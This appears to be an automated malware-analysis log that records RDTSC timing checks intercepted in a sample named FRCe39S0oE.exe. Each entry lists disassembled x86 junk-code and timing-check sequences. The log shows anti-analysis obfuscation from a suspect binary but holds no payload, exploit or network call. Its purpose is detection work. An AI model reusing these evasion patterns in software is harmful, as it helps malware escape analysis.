Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FE0094 second address: 4FE0099 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FE0099 second address: 4FE0113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, 393E2215h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d jmp 00007F132877E3B0h 0x00000012 mov ebp, esp 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F132877E3AEh 0x0000001b add ch, 00000018h 0x0000001e jmp 00007F132877E3ABh 0x00000023 popfd 0x00000024 jmp 00007F132877E3B8h 0x00000029 popad 0x0000002a and esp, FFFFFFF8h 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov si, di 0x00000033 jmp 00007F132877E3B9h 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FE0113 second address: 4FE0162 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1328EC0E01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F1328EC0DFCh 0x00000011 add eax, 3D67B638h 0x00000017 jmp 00007F1328EC0DFBh 0x0000001c popfd 0x0000001d pushad 0x0000001e jmp 00007F1328EC0E06h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FE0162 second address: 4FE01B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F132877E3B1h 0x0000000c xchg eax, ebx 0x0000000d jmp 00007F132877E3AEh 0x00000012 xchg eax, esi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F132877E3ADh 0x0000001c xor si, F8E6h 0x00000021 jmp 00007F132877E3B1h 0x00000026 popfd 0x00000027 pushad 0x00000028 popad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FE01B5 second address: 4FE01EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1328EC0E07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ecx, edi 0x0000000d mov al, bh 0x0000000f popad 0x00000010 xchg eax, esi 0x00000011 jmp 00007F1328EC0DFAh 0x00000016 mov esi, dword ptr [ebp+08h] 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FE01EB second address: 4FE01EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FE01EF second address: 4FE01F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FE01F3 second address: 4FE01F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FE01F9 second address: 4FE01FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FE01FF second address: 4FE0203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FE0203 second address: 4FE0228 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub ebx, ebx 0x0000000a jmp 00007F1328EC0E03h 0x0000000f test esi, esi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FE0228 second address: 4FE0243 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F132877E3B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FE0243 second address: 4FE029F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1328EC0E09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F139BC36F24h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F1328EC0E03h 0x00000018 add ecx, 1CFAB64Eh 0x0000001e jmp 00007F1328EC0E09h 0x00000023 popfd 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FE029F second address: 4FE02A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FE03E9 second address: 4FE0424 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov dl, ah 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebx 0x0000000b pushad 0x0000000c mov ah, dl 0x0000000e mov ax, 120Dh 0x00000012 popad 0x00000013 xchg eax, ebx 0x00000014 pushad 0x00000015 push eax 0x00000016 mov dx, 1828h 0x0000001a pop ebx 0x0000001b mov eax, 4137987Dh 0x00000020 popad 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F1328EC0E05h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FE0424 second address: 4FE0439 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F132877E3B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FE0439 second address: 4FE04B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1328EC0E07h 0x00000009 or ah, 0000007Eh 0x0000000c jmp 00007F1328EC0E09h 0x00000011 popfd 0x00000012 mov edi, eax 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebx 0x00000018 pushad 0x00000019 mov di, cx 0x0000001c pushfd 0x0000001d jmp 00007F1328EC0E04h 0x00000022 jmp 00007F1328EC0E05h 0x00000027 popfd 0x00000028 popad 0x00000029 push dword ptr [ebp+14h] 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f movsx ebx, ax 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FE04EA second address: 4FE04EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FE04EE second address: 4FE04F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FE04F4 second address: 4FE0505 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F132877E3ADh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FE0505 second address: 4FE0514 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FE0514 second address: 4FE0518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FE0518 second address: 4FE052E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1328EC0E02h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FC0D47 second address: 4FC0D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FC0D4B second address: 4FC0D68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1328EC0E09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FC0D68 second address: 4FC0DB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F132877E3ADh 0x0000000b or si, FF76h 0x00000010 jmp 00007F132877E3B1h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a jmp 00007F132877E3AEh 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F132877E3AEh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FC0DB5 second address: 4FC0DBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FC0DBB second address: 4FC0DBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FC0DBF second address: 4FC0DD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c mov ebx, 377976F8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5040979 second address: 504097D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 504097D second address: 5040981 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5040981 second address: 5040987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5040987 second address: 504098E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, ECh 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 504098E second address: 50409B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F132877E3AAh 0x0000000d mov ebp, esp 0x0000000f jmp 00007F132877E3B0h 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 50409B8 second address: 50409C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bx, 520Eh 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5030CBB second address: 5030CD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F132877E3B4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5030CD3 second address: 5030CD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5030CD7 second address: 5030D0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007F132877E3ACh 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F132877E3B0h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F132877E3AAh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5030D0F second address: 5030D13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5030D13 second address: 5030D19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5030D19 second address: 5030D4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edi 0x00000005 call 00007F1328EC0E08h 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007F1328EC0DFAh 0x00000017 mov edx, esi 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5030A2C second address: 5030A32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FD06F0 second address: 4FD072F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1328EC0DFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F1328EC0E06h 0x0000000f mov ebp, esp 0x00000011 jmp 00007F1328EC0E00h 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FD072F second address: 4FD0733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FD0733 second address: 4FD0737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FD0737 second address: 4FD073D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 50400C5 second address: 50400D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1328EC0E00h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10AAB9A second address: 10AAB9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10AAB9E second address: 10AABA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10AABA2 second address: 10AABA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 50102F0 second address: 5010337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F1328EC0DFDh 0x0000000a adc cl, FFFFFFE6h 0x0000000d jmp 00007F1328EC0E01h 0x00000012 popfd 0x00000013 popad 0x00000014 mov dl, ch 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F1328EC0E03h 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5010337 second address: 501033B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 501033B second address: 5010341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5010341 second address: 50103DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edx 0x00000005 jmp 00007F132877E3B4h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d and esp, FFFFFFF0h 0x00000010 pushad 0x00000011 movzx ecx, di 0x00000014 movsx edi, ax 0x00000017 popad 0x00000018 sub esp, 44h 0x0000001b jmp 00007F132877E3B2h 0x00000020 xchg eax, ebx 0x00000021 pushad 0x00000022 call 00007F132877E3AEh 0x00000027 movzx eax, bx 0x0000002a pop ebx 0x0000002b mov esi, 1F087D43h 0x00000030 popad 0x00000031 push eax 0x00000032 pushad 0x00000033 mov esi, edi 0x00000035 mov dh, 45h 0x00000037 popad 0x00000038 xchg eax, ebx 0x00000039 jmp 00007F132877E3AAh 0x0000003e xchg eax, esi 0x0000003f jmp 00007F132877E3B0h 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 mov cx, 5113h 0x0000004c jmp 00007F132877E3B8h 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 50103DB second address: 5010472 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1328EC0DFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b mov bx, ax 0x0000000e mov si, 1747h 0x00000012 popad 0x00000013 xchg eax, edi 0x00000014 pushad 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F1328EC0E06h 0x0000001c sub ax, 3D28h 0x00000021 jmp 00007F1328EC0DFBh 0x00000026 popfd 0x00000027 push esi 0x00000028 pop edi 0x00000029 popad 0x0000002a pushfd 0x0000002b jmp 00007F1328EC0E04h 0x00000030 and esi, 0B996F88h 0x00000036 jmp 00007F1328EC0DFBh 0x0000003b popfd 0x0000003c popad 0x0000003d push eax 0x0000003e pushad 0x0000003f mov ebx, 5A0D872Ah 0x00000044 mov edi, 3E54EBF6h 0x00000049 popad 0x0000004a xchg eax, edi 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F1328EC0E08h 0x00000052 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5010472 second address: 5010478 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5010478 second address: 501047C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 501047C second address: 50104A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F132877E3ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edi, dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F132877E3ADh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 50104A1 second address: 501057E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+24h], 00000000h 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F1328EC0E04h 0x00000017 and eax, 348F89D8h 0x0000001d jmp 00007F1328EC0DFBh 0x00000022 popfd 0x00000023 mov edi, esi 0x00000025 popad 0x00000026 lock bts dword ptr [edi], 00000000h 0x0000002b pushad 0x0000002c mov ah, BAh 0x0000002e mov edx, 1DDC0120h 0x00000033 popad 0x00000034 jc 00007F139BBB2D3Fh 0x0000003a pushad 0x0000003b pushfd 0x0000003c jmp 00007F1328EC0E00h 0x00000041 or cl, 00000068h 0x00000044 jmp 00007F1328EC0DFBh 0x00000049 popfd 0x0000004a popad 0x0000004b pop edi 0x0000004c pushad 0x0000004d pushfd 0x0000004e jmp 00007F1328EC0E04h 0x00000053 xor ah, FFFFFFC8h 0x00000056 jmp 00007F1328EC0DFBh 0x0000005b popfd 0x0000005c call 00007F1328EC0E08h 0x00000061 mov edx, ecx 0x00000063 pop ecx 0x00000064 popad 0x00000065 pop esi 0x00000066 pushad 0x00000067 push eax 0x00000068 push edx 0x00000069 pushfd 0x0000006a jmp 00007F1328EC0E09h 0x0000006f jmp 00007F1328EC0DFBh 0x00000074 popfd 0x00000075 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 501057E second address: 50105B2 instructions: 0x00000000 rdtsc 0x00000002 mov edx, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F132877E3B4h 0x0000000c sub si, 24E8h 0x00000011 jmp 00007F132877E3ABh 0x00000016 popfd 0x00000017 popad 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 50105B2 second address: 50105B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 50105B6 second address: 50105D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F132877E3B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 50105D1 second address: 50105F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 mov esi, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov esp, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1328EC0E08h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 50105F7 second address: 5010609 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F132877E3AEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5010609 second address: 501062F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1328EC0DFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F1328EC0DFBh 0x00000014 mov eax, 6576896Fh 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5010032 second address: 501011D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, bl 0x00000005 call 00007F132877E3AAh 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 jmp 00007F132877E3B7h 0x00000015 mov edi, esi 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a jmp 00007F132877E3B2h 0x0000001f xchg eax, ebx 0x00000020 pushad 0x00000021 jmp 00007F132877E3AEh 0x00000026 mov ch, 4Fh 0x00000028 popad 0x00000029 push eax 0x0000002a pushad 0x0000002b push esi 0x0000002c pop eax 0x0000002d call 00007F132877E3B5h 0x00000032 pushfd 0x00000033 jmp 00007F132877E3B0h 0x00000038 jmp 00007F132877E3B5h 0x0000003d popfd 0x0000003e pop ecx 0x0000003f popad 0x00000040 xchg eax, ebx 0x00000041 jmp 00007F132877E3B7h 0x00000046 xchg eax, esi 0x00000047 pushad 0x00000048 mov dh, ch 0x0000004a push eax 0x0000004b push edx 0x0000004c pushfd 0x0000004d jmp 00007F132877E3B7h 0x00000052 xor al, FFFFFFCEh 0x00000055 jmp 00007F132877E3B9h 0x0000005a popfd 0x0000005b rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 501011D second address: 5010155 instructions: 0x00000000 rdtsc 0x00000002 mov dl, al 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F1328EC0DFAh 0x0000000d xchg eax, esi 0x0000000e pushad 0x0000000f push esi 0x00000010 movsx edi, si 0x00000013 pop ecx 0x00000014 movsx ebx, ax 0x00000017 popad 0x00000018 mov esi, dword ptr [ebp+08h] 0x0000001b jmp 00007F1328EC0DFEh 0x00000020 sub ecx, ecx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 mov ch, 56h 0x00000027 push edx 0x00000028 pop ecx 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5010155 second address: 50101AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F132877E3B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F132877E3B0h 0x0000000f push eax 0x00000010 pushad 0x00000011 call 00007F132877E3B1h 0x00000016 mov ecx, 046F7B67h 0x0000001b pop eax 0x0000001c mov cx, bx 0x0000001f popad 0x00000020 xchg eax, edi 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F132877E3B2h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 50101AC second address: 50101B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5010995 second address: 50109AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F132877E3B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
